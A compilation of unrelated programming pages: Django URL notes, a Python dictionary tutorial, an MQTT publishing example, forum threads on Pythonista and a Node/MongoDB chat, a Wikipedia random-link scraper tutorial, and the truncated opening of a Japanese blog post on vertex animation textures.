二、后台路径参数的匹配
1.表的唯一关键字设置为id,设置类型为uuid,在模板里面传递参数。
先设置参数匹配的正则表达式
url(r'^category/(?P<pk>[0-9a-zA-Z\-]{36})/update/$', category.CategoryUpdateView.as_view(), name='category-update')
前台模板设置相关的Url标签为:
var the_url = '{% url "api-nav:category-detail" pk=DEFAULT_PK %}'.replace("{{ DEFAULT_PK }}", uid);
参数名需要设置一致,后台可以通过以下代码获取到后台传递的参数值。
self.object.pk
|
The script by command line works great without any error/exception. After lots of trying I've understood what blocks it.
My script (python2.7 with debian buster) starts with
Code: Select all
import os
import os.path
import json
prog_path = os.environ.get('prog_path')
Settings = os.path.join(prog_path, 'Settings.json')
export prog_path="/home/pi/programfldr/prog_path "
what I've found is that this line doesn't allow the script to run
Code: Select all
Settings = os.path.join(prog_path, 'Settings.json')
Can please someone help me to solve it?
Thanks a lot guys
|
In this article we are going to start a new topic dictionaries in python for class 11. As you know python supports different ways to handle data with collections such as list, tuple, set etc. Dictionary is also one of the collection based type. So here we start!
Comprehensive notes Dictionaries in Python for class 11
Comprehensive notes Dictionaries in Python for class 11 starts with the introduction to dictionary. So let’s think about the dictionary.
As we have used the English dictionary. It contains different words with its meanings. In python, the dictionary refers to the mapped items using key-value pairs. It is a versatile type of python.
A dictionary item doesn’t contain any index just like list or tuple. Every element in dictionary is mapped with key-value pair. The dictionary element can be referred to a key with the associated value.
What is a dictionary?
Dictionaries are mutable, unordered collections with elements in the form of a key:value pairs the associate keys to value. –
Textbook Computer Science with Python, Sumita Arora
In the dictionary, a key is separated from values using colon (:) and the values with commas.
In the next section of Comprehensive notes Dictionaries in Python for class 11, let’s discuss about how to create dictionary.
Creating a Dictionary
To create a dictionary follow this syntax:
<dictionary-object> = {<key>:<value>,<key:value>,.....}
According to the syntax:
<dictionary-object>: It is just like a variable, referred as dictionary object
=: As usual, it is assignment operator
{}: The curly braces are used to write key-value pairs inside
key:value pair: The items or elements of dictionary object will be written in this way
Points to remember:
While creating a dictionary always remember these points:
Each value is separated by a colon
The keys provided in the dictionary are unique
The keys can be of any type such as integer, text, tuple with immutable entries
The values can be repeated
The values also can be of any type
Observe the below given examples:
d = {'Mines':'Rajesh Thakare','HR':'Dinesh Lohana','TPP':'Kamlesh Verma','School':'A. Vijayan','Hospital':'Shailendra Yadav'}
d = {1:'Sharda',2:'Champa',3:'Babita',4:'Pushpa',5:'Chandirka',6:'Meena'}
d = {1:100,2:200,3:300,4:400}
Now understand the key-value pairs:
key-value pair Key Value
‘Mines’:’Rajesh Thakare’
1:’Sharda’
1:100
Mines
1
1
Rajesh Thakare
Sharda
100
‘HR’:’Dinesh Lohana’
2:’Champa’
2:200
HR
2
2
Dinesh Lohana
Champa
200
‘TPP’: ‘Kamlesh Verma’
3:’Babita’
3:300
‘TPP’
3
3
‘Kamlesh Verma’
‘Babita’
300
The next topic for Comprehensive notes Dictionaries in Python for class 11 is creating a dictionary. So let’s discuss it with examples.
Creating an empty dictionary
d = {}
As simple as that we have created an empty lists, empty tuple, you can also create an empty dictionary and manipulate it afterwards.
Dictionaries are also known as associative arrays or mappings or hashes.
After creating a dictionary in comprehensive notes Dictionaries in Python for class 11, now learn how to access the elements of a dictionary using various methods.
Accessing elements of the dictionary
Actually dictionaries are indexed based on their keys. So whenever you want to access the values of it keys are used to access them. Observe the following:
d = {1:'Virat Kohli',2:'Ajinkya Rehane',3:'Subhman Gill'}
#Priting with keys
print(d[1],d[3])
#Printing all values
print(d)
The process of taking a key and finding a value from the dictionary is known as lookup. Moreover, you cannot a access any element without key. If you try to access a value with key doesn’t exist in the dictionary, will raise an error.
Now have a look at the following code:
d = {'Mines':'Rajesh Thakare','HR':'Dinesh Lohana','TPP':'Kamlesh Verma','School':'A. Vijayan','Hospital':'Shailendra Yadav'}
for i in d:
print(i, ":",d[i])
In the above code you can see the variable i prints the key and d[i] prints the associated value to the key.
d = {'Mines':'Rajesh Thakare','HR':'Dinesh Lohana','TPP':'Kamlesh Verma','School':'A. Vijayan','Hospital':'Shailendra Yadav'}
for i,j in d.items():
print(i, ":",j)
Here, I have separated the values using two variables in the loop.
You can also access the keys and values using d.keys() and d. values() respectively. It will return the keys, and values in the form of sequence. Observe this code and check the output yourself:
d = {'Mines':'Rajesh Thakare','HR':'Dinesh Lohana','TPP':'Kamlesh Verma','School':'A. Vijayan','Hospital':'Shailendra Yadav'}
print(d.keys())
print(d.values())
Now let’s getting familiar with common operations can be performed with a dictionary for comprehensive notes Dictionaries in Python for class 11.
Create dictionary using dict() function
A dict() function can be used to create a dictionary and initialize the elements as key:value pair. For example,
pr = dict(name='Ujjwal',age=32,salary=25000,city='Ahmedabad')
print(pr)
You can also specify the key:pair value in following manners:
pr = dict({'name':'Ujjwal','age':32,'salary':25000,'city':'Ahmedabad'})
print(pr)
You can also specify the key-values in the form sequences (nested list) as well. Observe the following code:
pr = dict([['name','Ujjwal'],['age',32],['salary',25000],['city','Ahmedabad']])
print(pr)
In the next section of comprehensive notes Dictionaries in Python for class 11, lets discuss about how to add elements to a dictionary.
Add elements to a dictionary
You can add an element to the dictionary with the unique key which is not already exist in the dictionary. Look at the following code:
pr = dict([['name','Ujjwal'],['age',32],['salary',25000],['city','Ahmedabad']])
pr['dept']='school'
print(pr)
Update an element in a dictionary
To update the element, use a specific key and assign the new value for the dictionary. Observe this code:
d = dict({'name':'Ujjwal','age':32,'salary':25000,'city':'Ahmedabad'})
d['salary']=30000
print(d)
Now in the next section of comprehensive notes Dictionaries in Python for class 11, you will learn how to delete elements from the dictionary.
Deleting element from the dictionary
You can delete the elements by using del, pop() and popitem() function. The pop() function we will discuss in another article. Observe the following code for del:
d = dict({'name':'Shyam','age':32,'salary':25000,'city':'Ahmedabad'})
del d['age']
Membership Operator
As we you know in and not in operator we have used with list and tuple, similarly used with dictionary. If key is present in the dictionary, it will return true otherwise false. Look at the code:
d = dict({'name':'Shyam','age':32,'salary':25000,'city':'Ahmedabad'})
if 'name' in d:
print("Key found")
else:
print("Key not found")
if 'Shyam' in d.values():
print("Value found")
else:
print("Value not found")
So I hope you are now familiar with the concept dictionary in python after reading this article Dictionaries in Python for class 11. If you have doubt or query regarding the article, feel free to ask in the comment section.
Share your feedback and views in the comment section. Hit the like button and share the article with your friends.
Thank you for reading this article.
|
软硬件环境
ubuntu 18.04 64bit
anaconda3 & python3.6.2
paho-mqtt
预备知识
参考之前写的一篇博文 https://xugaoxiang.com/2019/12/08/mqtt/,博文测试时mqtt broker采用的是mosquitto,同时在测试发送和接收时采用mosquitto_sub和mosquitto_pub命令行工具。
安装paho-mqtt
conda install paho-mqtt
代码实践
import paho.mqtt.client as mqtt
def on_connect(client, userdata, flags, rc):
'''
:param client:
:param userdata:
:param flags:
:param rc:
:return:
'''
print('connect with rc: {}'.format(rc))
if rc != 0:
print('pub connect failed.')
client.disconnect()
def on_disconnect(client, userdata, rc=0):
'''
:param client:
:param userdata:
:param rc:
:return:
'''
print('disconnect with rc: {}'.format(rc))
client.loop_stop()
def on_publish(client, userdata, mid):
'''
:param client:
:param userdata:
:param mid:
:return:
'''
print('publish success.')
def do_publish(topic, message):
'''
:param topic:
:param message:
:return: publish message via mqtt
'''
client = mqtt.Client()
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_publish = on_publish
client.connect(host='127.0.0.1', port=1883, keepalive=60)
client.loop_start()
try:
client.publish('{}'.format(topic), '{}'.format(message))
except:
print('publish {} exception.'.format(message))
finally:
client.disconnect()
上述代码完成的是信息发布,分别实现了客户端连接、发布、断开的回调,在connect之后调用loop_start(),其作用是开启新的后台线程,防止主线程被阻塞,在client断开后要loop_stop杀掉线程。
信息的订阅寄接收的过程跟发布是一样的,publish换成subscribe,接收在on_message回调里进行处理。
|
NavView Template
niz
I've created a NavView template and put it on GitHub for anyone to use as a starting point for creating a NavView based app using Pythonista. https://github.com/ncarding/NavViewTemplate
I've done this because it took me ages to workout how to do it myself and I wanted to give something back to the community that unknowingly helped me workout all the problems along the way.
There is however a fairly large bug with the template that needs fixing before it is truly useful. I've tried various things and I just can't workout why the bug is there and how to fix it.
As it stands the NavView has two levels: Groups and People. You can create as many Groups as you like and have as many People in each group as you like.
The UI is built with Pythonista's ui module. The logic uses a custom object orientated module called simple_module. The objects that are created are saved and loaded (for persistence) using the pickle module.
Known Issue
The People lists should be independent of the Group lists, but at the moment they are not.
If you add a new Group then add one or more People to that group and then add a second Group, the People from the first Group are automatically added to the second and any additional Groups.
I can't tell where the bug is but it only effects Groups created with each launch of the app. E.g. If you create three Groups they will all contain the same People. If you then quit the app and relaunch it those people will still be in each Group but if you create more Groups they will not contain the original list of People. These new Groups will however all share any new People added to any of the Groups created in this session.
Any suggestions as to why this is happening and how I might fix it are welcome.
All the code is at https://github.com/ncarding/NavViewTemplate
abcabc
The "
init" method in simple_module.py is not correct. You can not have "empty list" as default parameter.
See the discussion here.
http://effbot.org/zone/default-values.htm
http://docs.python-guide.org/en/latest/writing/gotchas/
Mostly this should fix your bug. I have not tested it.
class Group():
def __init__(self, name, people = []):
self.name = name
# people is a list of People objects
self.people = people
ccc
The "fix" code contains an empty list as a default parameter. :-(. I would suggest:
class Group():
def __init__(self, name, people=None):
self.name = name
# people is a list of People objects
self.people = people or [] # converts None into an empty list
abcabc
It is not the fix. It is the part of the code that has the problem. I should have worded that properly. Anyway thanks for the correction.
ccc
I made a pull request on the repo so there is no ambiguity... I think you are correct that it should solve the open issue.
ccc
niz
Thank you for your help. This has indeed fixed the problem.
The code is there for anyone that wants to make use of it.
Phuket2
@niz , thanks for sharing. I have just tried it as I have doing nothing with the nav view before, well at least that I can remember.
But 2 things that stand out.
Seems like it would be easy to make it Python 2.7 and 3 compatible with a try on the pickle import, and maybe a protocol change that either version of pickle loaded could read an existing file.
Support for different presentations, i.e. Sheet, panel.
Just an idea
Phuket2
niz
Thanks @Phuket2 for the suggestions. I will look into them.
|
@Botenga delete this code you have at the end of your html:
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" type="text/css" href="bootstrap.css">
</body>
and it should work now
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1 without the jquery.min.js part
botenga sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
html-joe sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
var img = document.createElement('img')
img.src = stringified.weather[0].icon
hoxtygen sends brownie points to @mot01 :sparkles: :thumbsup: :sparkles:
document.getElementById('image-container').innerHTML = "<img src = "+stringified.weather[0].icon+">";
hoxtygen sends brownie points to @sorinr and @mot01 :sparkles: :thumbsup: :sparkles:
await try{this.getStreamData()}.catch(error){console.log(error)}; didn't work out when I made getStreamData async. Here's my pen:
primuscovenant sends brownie points to @heroiczero :sparkles: :thumbsup: :sparkles:
catherinewoodward sends brownie points to @terensu-desu :sparkles: :thumbsup: :sparkles:
<html>, <body> sections in them - that is provided by the template. animate.css you can paste it into the resource boxes directly, or they have "quick adds" and a way to search for the package that you want. CodePen is a nice useful site - just remember to stick with "Pen" items for your pages, as a free user (unless you've paid) you only have one "Project". I don't think that there is a limit to the number of "Pen" items? I have seen people get confused by the fact that they can only have one "project"... maybe that will be helpful to be aware of that.
@terensu-desu Sure!
<html>
<head>
<script type="text/javascript" src="https://safi.me.uk/typewriterjs/js/typewriter.js"></script>
<script>
var app = document.getElementById('app');
var typewriter = new Typewriter(app, {
loop: true
});
typewriter.typeString('Hello World!')
.pauseFor(2500)
.deleteAll()
.typeString('Strings can be removed')
.pauseFor(2500)
.deleteChars(7)
.typeString('altered!')
.start();
</script>
</head>
<body>
<div id="app"></div>
</body>
</html>
This is my code currently. Nothing shows when I run it. Just a blank page!
indikoro sends brownie points to @khaduch :sparkles: :thumbsup: :sparkles:
<script> element to the end just before the </body> closing tag. That will insure that the page is loaded before it tries to run the JS. $(document).wait()
hi can someone tell me how to fix this issue
i have setup a fixed navbar , the issue is the banner goes below the navbar
how to get the banner to showup after the navbar?
sorry reycuban, you can't send brownie points to yourself! :sparkles: :sparkles:
reycuban sends brownie points to @tiagocorreiaalmeida :sparkles: :thumbsup: :sparkles:
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?additional info'
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?additional info'
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!this is the problem.
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
const express = require('express');
const router = require('./api/router.js');
const bodyParser = require('body-parser');
const mongoose = require('mongoose');
const app = express();
mongoose.connect("mongodb://localhost/gomaxi");
mongoose.Promise = global.Promise;
app.use(express.static('public'));
app.use(bodyParser.json());
app.use(router);
app.listen(4000,function(){
console.log("server is listening for the request on port 4000 , hurray !");
});
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?
note :
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!
data back
router.get('/api/maxi',function(req,res){
console.log('1');
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log('2')
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>maxi</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
<input id="search1" placeholder="enter playername">
<input id="search2" placeholder="enter playerscore">
<button class="btn-primary">click</button>
<div class="well"></div>
</body>
<script>
$(document).ready(function(){
$(".btn-primary").click(function(){
console.log("click");
var obj = {
"player" : $("#search1").val(),
"score" : $("#search2").val()
};
$.ajax({
type : "POST",
url : "http://localhost:4000/api/maxi/",
contentType : "application/json",
data : JSON.stringify(obj),
success : function(data){
console.log(data);
$(".well").append("<h1>"+data.player + data.score+"</h1>");
},
error : function(err){
console.log('error' ,err);
},
dataType : "json"
});
});
});
</script>
</html>
```router.post('/', function (req, res, next) {
var user = new User({
firstName: req.body.firstName,
lastName: req.body.lastName,
password: bcrypt.hashSync(req.body.password, 10),
email: req.body.email
});
user.save(function(err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log("2");
cricketModel(req.body).save().then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
@1532j0004kg how about ```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
Mongoose: scores.insert({ player: 'q1', score: 1, _id: ObjectId("5a47bd6590f3561
5fc1c5ffe"), __v: 0 })
{ __v: 0, player: 'q1', score: 1, _id: 5a47bd6590f35615fc1c5ffe }
2
Mongoose: scores.insert({ player: 'q1w2', score: 1, _id: ObjectId("5a47bd6c90f35
615fc1c5fff"), __v: 0 })
{ __v: 0,
player: 'q1w2',
score: 1,
_id: 5a47bd6c90f35615fc1c5fff }
2
Mongoose: scores.insert({ player: 'q1w2as', score: 1, _id: ObjectId("5a47bd7390f
35615fc1c6000"), __v: 0 })
{ __v: 0,
player: 'q1w2as',
score: 1,
_id: 5a47bd7390f35615fc1c6000 }
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
var cricketModel = new CricketModel({
firstField: req.body.firstField, // Your model fields here
lastField: req.body.lastField,
});
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
var cricketModel = new CricketModel({
firstField: req.body.firstField, // Your model fields here
lastField: req.body.lastField,
});
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
Mongoose: scores.insert({ player: 'q1', score: 1, _id: ObjectId("5a47bd6590f3561
5fc1c5ffe"), __v: 0 })
{ __v: 0, player: 'q1', score: 1, _id: 5a47bd6590f35615fc1c5ffe }
2
Mongoose: scores.insert({ player: 'q1w2', score: 1, _id: ObjectId("5a47bd6c90f35
615fc1c5fff"), __v: 0 })
{ __v: 0,
player: 'q1w2',
score: 1,
_id: 5a47bd6c90f35615fc1c5fff }
2
Mongoose: scores.insert({ player: 'q1w2as', score: 1, _id: ObjectId("5a47bd7390f
35615fc1c6000"), __v: 0 })
{ __v: 0,
player: 'q1w2as',
score: 1,
_id: 5a47bd7390f35615fc1c6000 }
C:\Users\dinesh\Desktop\app1>scores.find();
'scores.find' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\dinesh\Desktop\app1>mongo.exe'mongo.exe' is not recognized as an internal or external command,operable program or batch file.C:\Users\dinesh\Desktop\app1>start mongo.exeThe system cannot find the file mongo.exe.
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>
> scores.find();
2017-12-30T08:49:19.995-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
2017-12-30T08:50:02.775-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
MongoDB shell version: 3.2.18-4-g752daa3
connecting to: test
Server has startup warnings:
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten] ** WARNING: This 32-bit
MongoDB binary is deprecated
2017-12-30T06:55:07.243-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.244-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.245-0800 I CONTROL [initandlisten] ** NOTE: This is a 32 bi
t MongoDB binary.
2017-12-30T06:55:07.270-0800 I CONTROL [initandlisten] ** 32 bit builds a
re limited to less than 2GB of data (or less with --journal).
2017-12-30T06:55:07.271-0800 I CONTROL [initandlisten] ** Note that journ
aling defaults to off for 32 bit and is currently off.
2017-12-30T06:55:07.272-0800 I CONTROL [initandlisten] ** See http://doch
ub.mongodb.org/core/32bit
2017-12-30T06:55:07.274-0800 I CONTROL [initandlisten]
>
> use database
switched to db database
> scores.find()
2017-12-30T08:52:26.512-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
> collections.find()
2017-12-30T08:52:36.159-0800 E QUERY [thread1] ReferenceError: collections is
not defined :
@(shell):1:1
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
2017-12-30T08:50:02.775-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
MongoDB shell version: 3.2.18-4-g752daa3
connecting to: test
Server has startup warnings:
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten] ** WARNING: This 32-bit
MongoDB binary is deprecated
2017-12-30T06:55:07.243-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.244-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.245-0800 I CONTROL [initandlisten] ** NOTE: This is a 32 bi
t MongoDB binary.
2017-12-30T06:55:07.270-0800 I CONTROL [initandlisten] ** 32 bit builds a
re limited to less than 2GB of data (or less with --journal).
2017-12-30T06:55:07.271-0800 I CONTROL [initandlisten] ** Note that journ
aling defaults to off for 32 bit and is currently off.
2017-12-30T06:55:07.272-0800 I CONTROL [initandlisten] ** See http://doch
ub.mongodb.org/core/32bit
2017-12-30T06:55:07.274-0800 I CONTROL [initandlisten]
>
C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mo
ngodbs
2017-12-30T08:59:19.588-0800 I CONTROL [main]
2017-12-30T08:59:19.592-0800 W CONTROL [main] 32-bit servers don't have journal
ing enabled by default. Please use --journal if you want durability.
2017-12-30T08:59:19.593-0800 I CONTROL [main]
2017-12-30T08:59:19.602-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
2017-12-30T08:59:19.611-0800 I CONTROL [initandlisten] MongoDB starting : pid=3
544 port=27017 dbpath=C:\mongodbs 32-bit host=dinesh007
2017-12-30T08:59:19.614-0800 I CONTROL [initandlisten] targetMinOS: Windows Vis
ta/Windows Server 2008
2017-12-30T08:59:19.615-0800 I CONTROL [initandlisten] db version v3.2.18-4-g75
2daa3
2017-12-30T08:59:19.617-0800 I CONTROL [initandlisten] git version: 752daa30609
5fb1610bb5db13b7b106ac87ec6cb
2017-12-30T08:59:19.618-0800 I CONTROL [initandlisten] allocator: tcmalloc
2017-12-30T08:59:19.619-0800 I CONTROL [initandlisten] modules: none
2017-12-30T08:59:19.622-0800 I CONTROL [initandlisten] build environment:
2017-12-30T08:59:19.623-0800 I CONTROL [initandlisten] distarch: i386
2017-12-30T08:59:19.624-0800 I CONTROL [initandlisten] target_arch: i386
2017-12-30T08:59:19.625-0800 I CONTROL [initandlisten] options: { storage: { db
Path: "C:\mongodbs" } }
2017-12-30T08:59:19.632-0800 E NETWORK [initandlisten] listen(): bind() failed
errno:10048 Only one usage of each socket address (protocol/network address/port
) is normally permitted. for socket: 0.0.0.0:27017
2017-12-30T08:59:19.633-0800 E STORAGE [initandlisten] Failed to set up sockets
during startup.
2017-12-30T08:59:19.635-0800 I CONTROL [initandlisten] dbexit: rc: 48
omgmerrickd sends brownie points to @vasejs and @import :sparkles: :thumbsup: :sparkles:
function palindrome(str) {var x = str.split('').reverse().join('');var y = x.replace(/[\W_]/g, '');var palindr = y.toLowerCase();if ( palindr == str){return true;}else {return false;}
}
palindrome("eye");
sorry vasejs, you can't send brownie points to yourself! :sparkles: :sparkles:
``` function palindrome(str) {
var x = str.split('').reverse().join('');
var y = x.replace(/[\W_]/g, '');
var palindr = y.toLowerCase();
if ( palindr == str){
return true;
}
else {
return false;
}
}
palindrome("eye"); ```
sakisbal sends brownie points to @vasejs :sparkles: :thumbsup: :sparkles:
function palindrome(str) {
var x = str.split('').reverse().join('');
var y = x.replace(/[\W_]/g, '');
var palindr = y.toLowerCase();
if ( palindr == str){
return true;
}
else {
return false;
}
}
palindrome("eye");
return str.replace(/[\W_]/g, '').toLowerCase()=== str.replace(/[\W_]/g, '').toLowerCase().split('').reverse().join('');
|
In this article I'm going to create a web scraper in Python that will scrape Wikipedia pages.
The scraper will go to a Wikipedia page, scrape the title, and follow a random link to the next Wikipedia page.
I think it will be fun to see what random Wikipedia pages this scraper will visit!
Setting up the scraper
To start, I'm going to create a new python file called scraper.py:
touch scraper.py
To make the HTTP request, I'm going to use the requests library. You can install it with the following command:
pip install requests
Let's use the web scraping wiki page as our starting point:
import requests
response = requests.get(
url="https://en.wikipedia.org/wiki/Web_scraping",
)
print(response.status_code)
When running the scraper, it should display a 200 status code:
python3 scraper.py200
Alright, so far so good! ?
Extracting data from the page
Let's extract the title from the HTML page. To make my life easier I'm going to use the BeautifulSoup package for this.
pip install beautifulsoup4
When inspecting the Wikipedia page I see that the title tag has the #firstHeading ID.
Beautiful soup allows you to find an element by the ID tag.
title = soup.find(id="firstHeading")
Bringing it all together the program now looks like this:
import requests
from bs4 import BeautifulSoup
response = requests.get(
url="https://en.wikipedia.org/wiki/Web_scraping",
)
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.find(id="firstHeading")
print(title.string)
And when running this, it shows the title of the Wiki article: ?
python3 scraper.pyWeb scraping
Scraping other links
Now I'm going to dive deep into Wikipedia. I'm going to grab a random <a> tag to another Wikipedia article and scrape that page.
To do this I will use beautiful soup to find all the <a> tags within the wiki article. Then I shuffle the list to make it random.
import requests
from bs4 import BeautifulSoup
import random
response = requests.get(
url="https://en.wikipedia.org/wiki/Web_scraping",
)
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.find(id="firstHeading")
print(title.content)
# Get all the links
allLinks = soup.find(id="bodyContent").find_all("a")
random.shuffle(allLinks)
linkToScrape = 0
for link in allLinks:
# We are only interested in other wiki articles
if link['href'].find("/wiki/") == -1:
continue
# Use this link to scrape
linkToScrape = link
break
print(linkToScrape)
As you can see, I use the soup.find(id="bodyContent").find_all("a") to find all the <a> tags within the main article.
Since I'm only interested in links to other wikipedia articles, I make sure the link contains the /wiki prefix.
When running the program now it displays a link to another wikipedia article, nice!
python3 scraper.py
<a href="/wiki/Link_farm" title="Link farm">Link farm</a>
Creating an endless scraper
Alright, let's make the scraper actually scrape the new link.
To do this I'm going to move everything into a scrapeWikiArticle function.
import requests
from bs4 import BeautifulSoup
import random
def scrapeWikiArticle(url):
response = requests.get(
url=url,
)
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.find(id="firstHeading")
print(title.text)
allLinks = soup.find(id="bodyContent").find_all("a")
random.shuffle(allLinks)
linkToScrape = 0
for link in allLinks:
# We are only interested in other wiki articles
if link['href'].find("/wiki/") == -1:
continue
# Use this link to scrape
linkToScrape = link
break
scrapeWikiArticle("https://en.wikipedia.org" + linkToScrape['href'])
scrapeWikiArticle("https://en.wikipedia.org/wiki/Web_scraping")
The scrapeWikiArticle function will get the wiki article, extract the title, and find a random link.
Then, it will call the scrapeWikiArticle again with this new link. Thus, it creates an endless cycle of a Scraper that bounces around on wikipedia.
Let's run the program and see what we get:
pythron3 scraper.py
Web scraping
Digital object identifier
ISO 8178
STEP-NC
ISO/IEC 2022
EBCDIC 277
Code page 867
Code page 1021
EBCDIC 423
Code page 950
G
R
Mole (unit)
Gram
Remmius Palaemon
Encyclopædia Britannica Eleventh Edition
Geography
Gender studies
Feminism in Brazil
Awesome, in roughly 10 steps we went from "Web Scraping" to "Feminism in Brazil". Amazing!
Conclusion
We've built a web scraper in Python that scrapes random Wikipedia pages. It bounces around endlessly on Wikipedia by following random links.
This is a fun gimmick and Wikipedia is pretty lenient when it comes to web scraping.
There are also harder to scrape websites such as Amazon or Google. If you want to scrape such a website, you should set up a system with headless Chrome browsers and proxy servers. Or you can use a service that handles all that for you like this one.
But be careful not to abuse websites, and only scrape data that you are allowed to scrape.
Happy coding!
|
サイバーエージェントゲーム・エンターテイメント事業部(SGE)に所属する子会社QualiArtsで、テクニカルアーティスト室に所属しているテクニカルアーティストの塩塚です。今回はMayaとUnityを用いて頂点アニメーションテクスチャ(VertexAnimationTexture)を実現する方法を紹介します。
また、本記事はQualiArtsの定期ブログ「QualiArts Tech Note」第6弾の記事となります。QualiArtsでは会社で使われている様々な技術の知見をブログとして配信しています。興味のある方は、QualiArtsとタグの付いている他の記事もチェックしてみてください。
テクニカルアーティストとは
テクニカルアーティスト通称TAとは、アーティストとエンジニアの橋渡しを行う職種です。QualiArtsには各プロジェクトに横断的に関わるテクニカルアーティスト室があり、私は2020年に新卒で入社しこちらに配属されました。TAと言っても役割は会社によってマチマチかと思いますが、私はエンジニア出身でパイプライン系のコードを書くことが多いです。具体的にはMayaのプラグインや、Unityのエディタ拡張の開発を行い、クリエイターの作業効率化などに携わっています。
頂点アニメーションテクスチャとは
